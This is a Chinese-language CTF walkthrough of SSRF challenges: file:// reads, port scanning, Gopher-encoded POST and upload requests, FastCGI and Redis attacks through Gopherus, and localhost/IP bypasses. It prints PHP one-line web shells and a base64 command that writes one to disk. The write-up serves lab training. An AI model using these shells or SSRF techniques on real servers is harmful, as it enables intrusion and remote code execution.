内网访问

点击进入环境,输入
http://127.0.0.1/flag.php

伪协议读取文件

/?url=file:///var/www/html/flag.php

右击查看页面源代码

端口扫描

1.根据题目提示我们知道端口号在8000-9000之间,使用bp抓包并进行爆破




POST请求

点击环境,访问flag.php

查看页面源代码,得到key

复制key值去输入框输入,并用bp抓到数据包

构造POST请求数据包

进行的url编码

将%0A全部替换为%0d%0A 并在末尾加上%0d%0A

将得到的编码进行二次编码

%253A改为:

使用Gopher进行攻击访问,获取Flag

上传文件
这一关跟POST请求类似

点击环境,访问flag.php

点击浏览上传php文件,发现没有提交按钮,按F12打开查看器
右键编辑HTML

添加一个提交按钮submit


选择php文件点击提交,并用bp抓到数据包

构造POST请求数据包

进行的url编码

将%0A全部替换为%0d%0A 并在末尾加上%0d%0A

将得到的编码进行二次编码

%253A改为:

使用Gopher进行攻击访问,获取Flag

FastCGI协议
一句话木马
<?php @eval($_POST['cmd']);?>
<?php system($_GET[a]);?>

先点击题目附件了解 FastCGI协议
然后点击环境
先尝试访问flag.php,发现没有

在访问index.php 发现为空

打开kali使用Gopherus工具

找到fastcgi

桌面生成一个一句话木马php文件
一句话木马
<?php @eval($_POST['cmd']);?>
先去base64编码

echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > 1.php


将得到的代码进行url编码

去访问 记得%3A改为:


再访问1.php

使用木马连接工具进行连接



Redis协议

先尝试访问flag.php,发现没有

在访问index.php 发现为空

打开kali使用Gopherus工具

二次编码

%3A改为: 去访问

复制网址去进行连接




URL Bypass
绕过获取flag

数字IP Bypass

根据题目ban掉十进制;我们选择16进制绕过

也可以使用localhost

302跳转 Bypass
使用localhost绕过

十六进制也可
还有0.0.0.0

DNS重绑定 Bypass
使用DNS回环地址绕过

